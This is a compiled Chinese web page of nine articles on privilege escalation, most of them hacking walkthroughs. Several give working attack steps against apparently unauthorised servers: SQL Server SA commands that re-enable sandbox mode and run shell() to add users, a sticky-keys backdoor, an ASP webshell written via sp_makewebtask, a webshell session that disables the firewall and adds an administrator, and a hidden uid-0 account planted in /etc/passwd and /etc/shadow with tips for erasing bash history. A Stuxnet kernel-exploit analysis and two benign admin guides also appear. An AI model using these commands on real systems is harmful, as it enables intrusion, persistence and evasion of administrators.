提权不仅仅是文件权限上的问题

下面小编为大家整理了提权不仅仅是文件权限上的问题，本文共9篇，欢迎阅读与借鉴!

篇1：提权不仅仅是文件权限上的问题

作者：Nobug32

我们一般的提权方式都是从文件系统入手，也就是我们常说的NTFS权限方面，我认为，这应该是一个误区，如果你越是深入的专注于文件系统，那么后面的路将会非常艰辛

文件系统是构造一个操作系统所必需的，但是提权是操作系统的权限，而不是仅仅的一个'文件系统'

自然如果是一名刚入门的网友了解或学习这方面的知识，那么文件系统将会是您必须入手的部分，但是也请不要将文件系统归纳为就等同于系统的提权。所说的‘文件系统’，简而言之就是方便对我们的文件进行操作管理，同时随文件系统的深入，也涉入了权限之中，这可能便是我们所说的那一个误区

某次我在对一个国外的shell进行提权测试的时候，发现对方的Manager在文件权限上作的非常好，甚至可能是对于当时的我来说无懈可击了，我曾经以为那是一个不可攻克的目标，我尝试了关于文件系统方面所有的方法，都一一失败的了，如果说有一种新的方法那么这将是突破一些的利箭，

方法往往都很简单，其实只是误区将我们带入了绝境。

这里我们阐述的只是关于文件系统这样的一个误区，具体的方面并没有公布，此文仅仅告诉大家不要过分专注于文件系统方面的提权

篇2：SA权限沙盘模式提权方法

方便自己记忆再写出来，在这种情况下，要执行命令，条件是要有xp_regwrite，

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\ Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(“cmd.exe /c net user cnfjhh fst /add”)')

篇3：SA权限的入侵及小议SA提权

本篇讲解一次SA权限的入侵并小议SA提权，

试在NB里面恢复CMDSHELL、OACREAT都没有成功，所以开启SQLSERVERAGENT

;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--

还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式

;execmaster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--

回显成功，进一步调用oledb执行系统命令

and 0(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell(“cmd /c echo 1 >c:\1.txt”)'))--

回显500，明显出错了，沙盒模式也暂且放下 既然可以写注册表，那一定可以读注册表，那先读读终端端口看看。

是默认的3389但是我无法连接，或许是没开终端服务，或许是防火墙屏蔽，不得而知，一定想知道我为什么要连接终端吧，下面看这段语句。

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int

exec sp_oacreate 'scripting.filesystemobject', @oo out

exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

大家一定记得最近很流行的SHIFT后吧，以上两段语句就是利用FSO组件的读写权限替换粘拈键为桌面的启动程序EXPLORER，如果替换成功那么执行5次SHIFT后就可以直接执行EXPLORER.EXE开启桌面，但是连不上远程这个方法也就不能用了。当然以上的命令需要OACREAT的支持，我也就是抱着侥幸的心理试试看。假设OACREAT没有删，我们还可以利用以下语句执行系统命令。

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234 /add';--

;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234/add';--

以上两个语句也是利用OACREAT调用wscript.shell和Shell.Application组件执行系统命令,但是在这里我们是用不了的，因为不仅OACREAT不在，就连那两个危险组件管理也写了个批处理卸了。

万般无奈下尝试lOG备分拿只SHELL，可是备分的页面却是404，很显然这个SA没有备分的权限，还能怎么做?看下面：

;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request(“a”))%25>''%20';--

利用sp_makewebtask这个存储过程写个马进去，很幸运这个过程是能用的，成功得到SHELL，本来想传xplog70.dll上去恢复xp_cmdshell存储过程，但是执行恢复的时候发现这个过程是在的，然后在海洋里执行CMDSHELL执行系统命令，但是出现了这一句，

xpsql.cpp: 错误 2 来自 CreateProcess（第 737 行

我晕啊，难道是CMD.EXE删了?在NB里面列目录查看SYSTEM32下的文件，果然没有cmd.exe，这下终于真象大白了，原来不能执行系统命令的原因是每个存储过程都是调用系统的cmd.exe，既然没有cmd.exe那还怎么执行系统命令?管理还是下了辛苦的哦，

整理下思路后我又想到了沙盒模式，因为啥盒模式调用的CMD不一定是系统自带的，我们可以自己传一个上去的，想到这里在WEB目录下传了个CMD.EXE然后在海洋里执行如下语句

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell(“d:\zjkdj\zjkdj\zjkds\cmd.exe /c net start>D:\zjkdj\zjkdj\zjkds\1.txt”)')--

立刻到站点目录下找1.txt，但是没有发现，看来只能调用系统自带的程序了，无聊的在SYSTEM32下乱逛，突然发现了command.com这个程序，哈哈，总算看到希望了!这是什么?我来告诉你吧，它也是系统自带的执行系统命令的程序，和CMD.EXE的功能几乎没有区别，但是大小却比CMD.EXE小几十倍，既然不让调用外部程序那我就调用内部程序，马上就在海洋里修改好如下语句执行。

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell(“command.com /c net start>D:\zjkdj\zjkdj\zjkds\1.txt”)')--

调用command.com执行系统

命令，执行完成后在站点目录下总算找到了1.txt

哈哈，总算看到希望了，打开1.txt看看服务器开了什么服务，但是我却看到一片空白，这是什么原因?难道?还是确定一下比较好，立刻转到SYSTEM32下查看文件，令我吃惊的是居然没有看到NET.EXE，怪不得一片空白呢，系统根本没有net.exe这个程序，自然是什么也看不到，郁闷，管理员不是一般的变态啊!

不过没有关系，windows系统中还有一个叫net1.exe的程序功能是和net.exe一样的哦，我们来调用它执行系统命令，语句如下

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell(“command.com /c net1 start>D:\zjkdj\zjkdj\zjkds\1.txt”)')--

执行完毕后再看1.txt

哈哈，成功了，入侵到了这里也就没有什么继续的必要了，因为我们已经有了系统权限，想做什么都随自己愿意了，收拾收拾在管理员的桌面上写个提醒.txt告诉他漏洞所在，让他尽快修补吧!

最后总结一下，在先前以为是系统的存储过程删掉了，但是后来随着入侵的深入才发现过程并没有删，只是每个存储过程都必须调用cmd.exe所以不能执行系统命令也是肯定的了，所以大家在入侵的时候一定要细心的分析整个过程，从中找出对自己有用的东西。

篇4：SA权限沙合模式提权方法

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，也被一些人不断的再次提出来，为了方便自己记忆再写出来，在这种情况下，要执行命令，条件是要有xp_regwrite，

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(“cmd.exe /c net user cnfjhh fst /add”)')

篇5：Win32k.sys键盘布局文件提权漏洞分析

作者：Sebastien Renaud

译者：riusksk（泉哥：riusksk.blogbus.com）

本文将向各位揭示一些关于Stuxnet蠕虫病毒的技术细节，主要旨在讲述作者是如何利用0day漏洞实现代码的通用性，文中讨论的是作者所用到的两个Windows提权漏洞之一。这一漏洞在微软发布的MS10-073升级补丁中已经修复了，但还有另一个windows任务调度（Task Scheduler）漏洞尚未修补。虽然本文将深入分析Stuxnet病毒及其执行的恶意行为，但我们仍将不会公布由来自Symantec和ESET的朋友所写的两份详细文档，包括其具体目录和内容。我们将主要关注下Windows Win32K.sys 键盘布局文件提权漏洞(CVE--2743)，并分析下Stuxnet病毒是如何使用自定义的Portable Executable (PE)解析方式来实现代码的通用性的。

1.      漏洞分析

此漏洞存在于windows驱动文件”win32k.sys”中，当其从磁盘中加载一个键盘布局文件时，由于不正当地去索引函数指针列表，导致本地提权漏洞的产生。通常，键盘布局文件是通过”LoadKeyboardLayout”函数来加载的，该函数其实是对win32k syscall函数 ”NtUserLoadKeyboardLayoutEx()” 的封装。下面是加载键盘布局文件后内核中的栈情况：

kd>kn

# ChildEBP RetAddr

00 b0982944 bf861cd1 win32k!SetGlobalKeyboardTableInfo

01 b0982958 bf889720 win32k!ChangeForegroundKeyboardTable+0x11c

02 b0982978 bf87580e win32k!xxxSetPKLinThreads+0x37

03 b09829f0 bf875588 win32k!xxxLoadKeyboardLayoutEx+0x395

04 b0982d40 8053d658 win32k!NtUserLoadKeyboardLayoutEx+0x164

05 b0982d40 7c90e514 nt!KiFastCallEntry+0xf8

06 0012fccc 00402347 ntdll!KiFastSystemCallRet ; (transition from user to kernel)

一旦恶意构造的键盘布局文件被win32k内核驱动加载后，恶意程序将会向键盘输入流中发送一个事件，进而有效地触发漏洞。此过程会调用”user32!SendUserInput()”函数来执行，其实，它是调用了”win32k!NtUserSendInput()”和”win32k!xxxKENLSProcs()”这两个函数：

kd>kn

# ChildEBP RetAddr

00 b0a5ac88 bf848c64 win32k!xxxKENLSProcs

01 b0a5aca4 bf8c355b win32k!xxxProcessKeyEvent+0x1f9

02 b0a5ace4 bf8c341b win32k!xxxInternalKeyEventDirect+0x158

03 b0a5ad0c bf8c3299 win32k!xxxSendInput+0xa2

04 b0a5ad50 8053d658 win32k!NtUserSendInput+0xcd

05 b0a5ad50 7c90e514 nt!KiFastCallEntry+0xf8

06 0012fd08 7e42f14c ntdll!KiFastSystemCallRet

07 0012fd7c 00401ded USER32!NtUserSendInput+0xc

WARNING: Stack unwind information not available. Following frames may be wrong.

08 0012fdac 00401331 CVE_2010_2743+0x1ded

在”win32k!xxxKENLSProcs()”函数里面，win32k驱动会去检索先前加载的键盘布局文件中的某一字节。这一字节会被置入ECX寄存器，然后作为函数指针表的索引值：

; In win32k!xxxKENLSProcs() function starting at 0xBF8A1F9C

; Module: win32k.sys - Module Base: 0xBF800000 - version: 5.1.2600.6003

;

.text:BF8A1F50 movzx ecx, byte ptr [eax-83h] // ECX 可被攻击者控制

.text:BF8A1F57 push edi

.text:BF8A1F58 add eax, 0FFFFFF7Ch

.text:BF8A1F5D push eax

.text:BF8A1F5E call _aNLSVKFProc[ecx*4]       // 索引函数数组指针

aNLSVKFProc函数数组包含有3个函数，并且后面跟随着一段字节数组：

.data:BF99C4B8 _aNLSVKFProc  dd offset _NlsNullProc@12

.data:BF99C4BC                       dd offset _KbdNlsFuncTypeNormal@12

.data:BF99C4C0                       dd offset _KbdNlsFuncTypeAlt@12

.data:BF99C4C4 _aVkNumpad db 67h

.data:BF99C4C5                       db 68h

.data:BF99C4C6                       db 69h

.data:BF99C4C7                       db 0FFh

.data:BF99C4C8                       db 64h

.data:BF99C4C9                       db 65h

.data:BF99C4CA                       db 66h

.data:BF99C4CB                       db 0FFh

.data:BF99C4CC                       db 61h

.data:BF99C4CD                       db 62h

.data:BF99C4CE                       db 63h

.data:BF99C4CF                       db 60h

.data:BF99C4D0                       db 6Eh

.data:BF99C4D1                       db 0

.data:BF99C4D2                       db 0

.data:BF99C4D3                       db 0

[...]

如果请求的索引值大于2，那么代码将会引用字节数组中的值作为指针，

如果索引值为5，那么在函数”win32k!xxxKENLSProcs()”中的代码就会调用0xBF99C4CC处的指针，相当于程序将执行至0x60636261。

kd>dds win32k!aNLSVKFProc L6

bf99c4b8 bf9332ca win32k!NlsSendBaseVk            // index 0

bf99c4bc bf93370c win32k!KbdNlsFuncTypeNormal // index 1

bf99c4c0 bf933752 win32k!KbdNlsFuncTypeAlt       // index 2

bf99c4c4 ff696867                                               // index 3

bf99c4c8 ff666564                                               // index 4

bf99c4cc 60636261                                              // index 5

[...]

2.      通过PE解析提高代码执行的通用性

当aNLSVKFProc函数数组未被引用输出时，为了获得可在各个”win32k.sys”驱动版本上执行恶意代码的通用性，Stuxnet作者必须确保索引数据位于aNLSVKFProc数组之外，并且指向一个可控制的有效指针，然后执行”call”指令

篇6：遇见一个权限很大的机器,菜刀提权过程

各位 大婶 红客大叔理解下哈   xxoo插插喔喔  代表网站  192.168.1.1 代表 服务器ip

[*] 磁盘列表 [ A:C:E: ]

D:\wamp\www\xxoo\plus\> help

设置终端路径:    SETP c:\windows\system32\cmd.exe 或者 SETP /bin/sh

切换到根目录:    ROOT

D:\wamp\www\xxoo\plus\> SETP c:\windows\system32\cmd.exe

设置终端路径为：:c:\windows\system32\cmd.exe

D:\wamp\www\xxoo\plus\> net user

\\ 的用户帐户

-------------------------------------------------------------------------------

Administrator        Guest              hzwwsj

SUPPORT_388945a0

命令运行完毕，但发生一个或多个错误，

D:\wamp\www\xxoo\plus\> netstat -an

Active Connections

Proto  Local Address      Foreign Address      State

TCP  0.0.0.0:80        0.0.0.0:0          LISTENING

TCP  0.0.0.0:135        0.0.0.0:0          LISTENING

TCP  0.0.0.0:445        0.0.0.0:0          LISTENING

TCP  0.0.0.0:1025        0.0.0.0:0          LISTENING

TCP  0.0.0.0:3306        0.0.0.0:0          LISTENING

TCP  0.0.0.0:3389        0.0.0.0:0          LISTENING

TCP  127.0.0.1:1026      0.0.0.0:0          LISTENING

TCP  127.0.0.1:3306      127.0.0.1:3532      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3533      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3534      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3535      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3536      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3537      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3538      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3539      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3540      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3542      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3543      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3544      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3545      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3546      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3547      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3548      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3550      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3551      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3552      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3553      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3554      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3555      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3556      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3557      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3558      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3559      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3560      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3561      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3563      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3564      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3565      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3566      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3567      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3568      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3569      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3570      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3571      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3572      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3573      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3574      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3575      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3576      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3577      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3578      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3579      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3580      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3583      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3585      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3586      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3588      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3590      ESTABLISHED

TCP  127.0.0.1:3306      127.0.0.1:3591      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3592      TIME_WAIT

TCP  127.0.0.1:3581      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3582      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3584      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3589      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3590      127.0.0.1:3306      ESTABLISHED

TCP  127.0.0.1:43958      0.0.0.0:0          LISTENING

TCP  127.0.0.1:43958      127.0.0.1:3541      TIME_WAIT

TCP  127.0.0.1:43958      127.0.0.1:3562      TIME_WAIT

TCP  192.168.1.1:21    0.0.0.0:0          LISTENING

TCP  192.168.1.1:80    14.17.18.146:40131    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40400    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40401    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40402    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40403    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40405    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:35188    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:37577    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:39584    ESTABLISHED

TCP  192.168.1.1:80    108.178.60.2:41667    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:47054    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:57571    TIME_WAIT

TCP  192.168.1.1:80    117.26.202.179:54990  ESTABLISHED

TCP  192.168.1.1:80    123.125.71.15:60628  TIME_WAIT

TCP  192.168.1.1:80    123.125.71.80:40429  ESTABLISHED

TCP  192.168.1.1:80    123.129.73.243:2543  TIME_WAIT

TCP  192.168.1.1:80    123.129.73.243:4352  TIME_WAIT

TCP  192.168.1.1:80    123.134.4.135:57203  LAST_ACK

TCP  192.168.1.1:80    123.134.4.135:57204  LAST_ACK

TCP  192.168.1.1:80    124.114.213.4:49936  ESTABLISHED

TCP  192.168.1.1:80    124.166.19.109:4975  ESTABLISHED

TCP  192.168.1.1:80    124.207.123.47:4375  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:7409  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:7411  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:18662  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:18663  TIME_WAIT

TCP  192.168.1.1:80    180.153.236.60:62502  TIME_WAIT

TCP  192.168.1.1:80    180.153.236.65:23047  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51648  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51649  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51650  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51651  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51652  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51653  TIME_WAIT

TCP  192.168.1.1:139  0.0.0.0:0          LISTENING

UDP  0.0.0.0:445        *:*

UDP  0.0.0.0:1228        *:*

UDP  127.0.0.1:123      *:*

UDP  127.0.0.1:1286      *:*

UDP  127.0.0.1:2269      *:*

UDP  127.0.0.1:2284      *:*

UDP  192.168.1.1:123  *:*

UDP  192.168.1.1:137  *:*

UDP  192.168.1.1:138  *:*

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 0.exe

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> c:

C:\> 1.exe

D:\wamp\www\xxoo\plus\> c:

C:\> 1.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> netsh firewall set opmode mode=disable

确定，

D:\wamp\www\xxoo\plus\> net user a a /add

命令成功完成。

D:\wamp\www\xxoo\plus\> net localgroup administrators a /add

命令成功完成。

下来 解释哈  ip连接不到3389  但3389 开了  想着 上传木马  命令

C:\> server.exe

D:\> 1.exe

没上线  后来发现360  我的不免杀  呵呵

想了一下为什么连接不到3389 呢  后来 想了一下就只有 防火墙了  命令

netsh firewall set opmode mode=disable

关闭防火墙  3389 成功打开

D:\wamp\www\xxoo\plus\> net user a a /add

命令成功完成。

D:\wamp\www\xxoo\plus\> net localgroup administrators a /add

命令成功完成。

用户建立ok

百年难遇的  菜刀提权  这个权限真是难得一见啊  哈哈  大牛们见笑了

篇7：对某root权限shell的进一步提权(jsp)

对方环境：Readhat+Tomcat+JSP+MYSQL5

shell是root系统权限 也许有的同学问，都是root了还进一步~进到哪？

嗯~说下把，jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧 不吐槽了，在这种情况下呢，我们要远程登陆他的ssh 需要怎么做？

嗯 一般人都懂，直接编辑/etc/passwd和/etc/shadow呗~好吧

通过搜索 发现网上转来转去的并无效果，也就是通常说的无密码即可进入的添加账号~本人测试未果，也许人品？不管~进入backtrack5 直接

cat /etc/passwd

复制root那一行 然后继续

cat /etc/shadow

复制root那一行~~

获得

root:x:0:0:root:/root:/bin/bash

root:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

这个就是root的密码了 为了不重复 我们改一些东西吧

root是用户 我们改为r00t /root是主目录 我们也要改 就该为/home/root吧~！为什么？因为如果是/root 你登陆后所操作的一切都会被记录到history中 有的同学问，直接history -c清除不就OK拉~我想说的是 这样的话很容易引起管理员发觉~~

如果这样不小心被记录了，请不要急着清除~进入到shell或者创建用户后 再次登陆然后编辑/root/.bash_history文件把自己操作的命令删除即可！

ok~改变后就是

r00t:x:0:0:root:/home/root:/bin/bash

r00t:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

把第一行加入/etc/passwd 第二行加入/etc/shadow然后链接即可！

登陆账号:r00t 密码:toor

纯属科普 大大牛请无视~

篇8：Windows下运行程序的降权、提权和目录权限

Windows下系统防护从三个方面入手，FD目录权限，AD账户权限，RD注册表权限，通过账户对目录、注册表权限进行限制，从而做到立体防护，

Windows账户权限控制已经很细致，运行的程序继承于用户的权限，子进程继承于父进程的权限。以普通用户权限运行的程序能对系统目录、注册表读访问，无写入权限，而大部分用户不愿受控制而使用Administrator登录导致系统安全性大大降低，以下介绍保障系统的易用性上进行提权或降权来保障系统安全。

1.以普通用户登录，需要时再适当提权，Vista后系统加入了UAC控制，用户可轻易以管理员身份执行程序，XP下可使用runas以管理员用户运行提权。

runas /user:administrator “c:\WINDOWS\explorer.exe”

2.以管理员登录，对危险程序降权运行，XP下可使用组策略限制以基本用户运行或使用DropMyRights降权。

XP组策略添加受限用户、基本用户：

1

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\ /v Levels /t REG_DWORD /d 0x31000

查看当前系统用户级别：

Runas /ShowTrustLevels

使用Runas以基本用户权限运行IE浏览器：

runas /trustlevel:基本用户 “C:\Program Files\Internet Explorer\Iexplore.exe”

使用DropMyRights降权运行IE浏览器：

DropMyRights.exe “c:\Program Files\Internet Explorer\IEXPLORE.EXE” -N

Windows7下不能正常使用DropMyRights，组策略下以基本用户运行和不允许一样，可使用psexec降权，

psexec -l -d “c:\program files\internet explorer\iexplore.exe”

篇9：局域网内共享文件 提示没有访问权限的问题

弹出以下“\\10.2.6.120无法访问。你可能没有权限访问网络资源。请与这台服务器的管理员联系以查明你是否有访问权限。拒绝访问。”

现在公司最喜欢用WIN2000/ xp，但是这个系统本身就带有些系统排斥，因为内网的资源是共享的，所以经常碰到等入不了的问题，系统提示：此工作组的服务器列表无法使用。下面就着手解决.但是首先,我们先来看下网络邻居互相访问的最基本的条件:

1.双方计算机打开，且设置了网络共享资源；

2.双方的计算机添加了 “Microsoft 网络文件和打印共享” 服务；

3.双方都正确设置了网内IP地址，且必须在一个网段中；

4.双方的计算机中都关闭了防火墙，或者防火墙策略中没有阻止网上邻居访问的策略。

5. XP首次使用时在网上邻居的属性里面已经新建一个网络连接进行网络安装向导

6.计算机之间的物理连接正常。在桌面计算机中，每个网卡后面的指示灯是亮的，集线器或交换机是打开的，而且每个客户端连接的指示灯都是亮的，网线的水晶头接触良好。

7.确保所有计算机上都安装了TCP/IP，并且工作正常。

在Windows XP中默认安装了TCP/IP。但是，如果出了网络问题想卸载后重新安装TCP/IP就不容易了：在“本地连接”属性中显示的此连接使用下列项目列表中单击Internet协议(TCP/IP)项，您将发现卸载按钮不可用(被禁用)。

这是因为传输控制协议/Internet协议(TCP/IP)堆栈是Microsoft XP/ 2003的核心组件，不能删除。在这种情况下，如果需要重新安装TCP/IP以使TCP/IP堆栈恢复为原始状态。可以使用NetShell实用程序重置TCP/IP堆栈，使其恢复到初次安装操作系统时的状态。方法是：在命令提示符后键入以下命令，然后按ENTER键：netsh int ip reset c:\resetlog.txt，其中，Resetlog.txt记录命令结果的日志文件，一定要指定，这里指定了Resetlog.txt日志文件及完整路径。运行此命令的结果与删除并重新安装TCP/IP协议的效果相同。

既然我们现在了解明白了这些条件,就可以着手解决:

第一种可能性就是本身系统系统浏览的正常现象。如微软公司文档中提到的预期的升级行为.详细的可以到这里看: support.microsoft.com/kb/304040/ZH-CN/

还有一点, 在实际的网络运用中，安装Windows XP系统的电脑有时会出现不能与Windows 98、Windows 2000的电脑互相访问的问题，即使是开启Guest账号、安装NetBEUI协议、设置共享文件夹，也不能正常访问,这就属于系统本身浏览的政策现象.

第二种是开了防火墙，在XP中自带的防火墙会导致无法访问网络邻居.可以通过命令net view \\computername 来查看.不论是2000还是XP只要关掉防火墙就可以.同时确保防火墙没有禁止以下端口的通讯：UDP－137、UDP－138、TCP－139、TCP－445（仅WIN2K及以后的操作系统）。 Windows XP最新的SP2补丁对ICS做了很大的改进，功能更强大了，ICS有了自己的设置项，安装SP2后，默认情况下，启用ICS防火墙，不允许任何外部主动连接，即使是本地的应用程序要访问网络也需要在许可列表中做设置。

但是防火墙阻断正常的网络浏览服务通讯，结果是别人在网上邻居中看不到你的计算机.这时候如果开启了ICS，打开属性，在服务这栏，选择添加，添加服务的对话框共有四个编辑框，最上边是描述服务名称，以便于记忆，从上到下第二个是应用服务的IP地址或名称，输入127.0.0.1表示本机。

下面连个是内外端口号，旁边的tcp/udp标示这个端口是udp连接还是tcp连接。

按照下面的表格输入3个服务

名称 协议 端口

NetBIOS Name Service UDP 137

NetBIOS Datagram Service UDP 138

NetBIOS Session Service TCP 139

PS: 137/UDP -- NetBIOS名称服务器,网络基本输入/输出系统(NetBIOS)名称服务器(NBNS)协议是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它在基于NetBIOS名称访问的网络上提供主机名和地址映射方法。138/UDP -- NetBIOS数据报,NetBIOS数据报是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它用于网络登录和浏览。

139/TCP -- NetBIOS会话服务,NetBIOS会话服务是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它用于服务器消息块(SMB)、文件共享和打印。

第三种是查看Guest用户激活了没有，可以从“控制面板|管理工具|计算机管理|本地用户和组|用户”中找到“Guest”账户，并用鼠标右击打开“Guest属性”对话框，去除这里的“账户已停用”复选框上的对钩标记 .Windows XP的Guest帐户允许其他人使用你的电脑，但不允许他们访问特定的文件，也不允许他们安装软件。对Windows XP Home Edition计算机或工作组中的Windows XP Professional计算机的所有网络访问都使用来宾帐户。使用net user guest确保为网络访问设置了来宾帐户，如果该帐户是活动的，命令输出中会出现一行类似下面这样的内容：Account active Yes；如果该帐户不是活动的，请使用下面的命令授予来宾帐户网络访问：

net user guest /active:yes

或者打开控制面板－>用户帐户或者在管理工具－>计算机管理－>本地用户和组中打开Guest帐户.同时设置为允许Guest(来宾)帐号从网络上访问。

在运行里输入gpedit.msc，弹出组策略管理器，在‘计算机配置-Windows设置-本地策略-用户权利指派’中，有“拒绝从网络访问这台计算机”策略阻止从网络访问这台计算机，如果其中有GUEST帐号,解决办法是删除拒绝访问中的GUEST帐号。

